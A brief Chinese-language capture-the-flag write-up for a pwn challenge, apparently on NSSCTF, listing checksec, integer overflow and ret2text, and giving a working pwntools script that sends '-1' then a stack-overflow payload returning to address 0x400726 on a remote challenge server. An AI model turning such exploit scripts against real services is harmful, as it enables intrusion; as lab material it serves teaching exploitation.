checksec pwn
整数溢出
ret2text
栈溢出
这行代码等待服务器发送包含 'your name:' 的提示,然后发送字符串 '-1'。这通常用于触发程序接收用户名的部分。
这行代码在收到包含 "name?" 的提示后,发送前面构造的载荷 payload。这通常用来触发某种缓冲区溢出或其他漏洞,进而将控制权转移到你指定的地址(0x400726)
from pwn import* p=remote("node4.anna.nssctf.cn",28324) p.sendlineafter('your name:',b'-1') payload=b'b'*(0x10+8)+p64(0x400726) p.sendlineafter("name?",payload) p.interactive()
